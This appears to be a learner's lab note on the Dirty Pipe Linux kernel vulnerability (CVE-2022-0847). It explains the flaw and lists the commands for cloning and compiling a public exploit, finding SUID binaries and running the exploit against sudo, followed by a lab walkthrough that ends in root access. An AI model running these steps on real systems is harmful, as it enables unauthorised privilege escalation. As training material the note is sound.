26 - dirty pipe (recent 0-day)

# Intro - [CVE-2022-0847](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847) (aka `Dirty Pipe`) is a vuln in the Linux kernel that allows unauthorized writing to root user files - This vuln is similar to the [Dirty Cow](https://dirtycow.ninja/) vuln discovered in 2016 - All kernels from version `5.8` to `5.17` are affected by this vuln - This vulnerability is based on pipes, which are a mechanism of unidirectional communication between processes - For example, we could edit the `/etc/passwd` file and remove the password prompt for the root - This would allow us to log in with the `su` command without the password prompt # Dirty Pipe Exploit - First, determine target's kernel version ```bash uname -a ``` - Once we confirm the vulnerability, we can use this [PoC](https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits) to exploit the `Dirty Pipe` vuln ```bash git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git cd CVE-2022-0847-DirtyPipe-Exploits bash compile.sh ``` - After compiling the code, we have two different exploits available ## `exploit-1` - The first exploit version (`exploit-1`) modifies the `/etc/passwd` and gives us a prompt with root privs ## `exploit-2` - With the help of the 2nd exploit version (`exploit-2`), we can execute SUID binaries with root privs - But, first, we first need to find these SUID binaries ```bash find / -perm -4000 2>/dev/null ``` - After determining that `/usr/bin/sudo` has the SUID bit set, we can execute `exploit-2` as below ```bash ./exploit-2 /usr/bin/sudo ``` --- # Exercise ## initial enum - `ping` test ![[images/Pasted image 20260214150323.png]] - `nmap` scans ![[images/Pasted image 20260214150501.png]] - `ssh` into target with given creds - initial internal enum ![[images/Pasted image 20260214150517.png]] ## Kernel and SUID Enum - Kernel version 5.15.0 is vulnerable to `Dirty Pipe` ![[images/Pasted image 20260214150616.png]] - `/usr/bin/sudo` has the SUID bit set ![[images/Pasted image 20260214150639.png]] ## Exploit the `Dirty Pipe` Vuln - `git clone` PoC on Kali ![[images/Pasted image 20260214150803.png]] - move `compile.sh` to target - serve form Kali ![[images/Pasted image 20260214151000.png]] - `wget` from target ![[images/Pasted image 20260214150948.png]] - compile on target - getting errors ![[images/Pasted image 20260214151135.png]] - looks like we need `exploit-1.c` and `exploit-2.c` on target - move `.c` files from Kali to target ![[images/Pasted image 20260214151237.png]] - try to compile again > successful this time ![[images/Pasted image 20260214151336.png]] - run the `exploit-2` > root! ![[images/Pasted image 20260214151452.png]]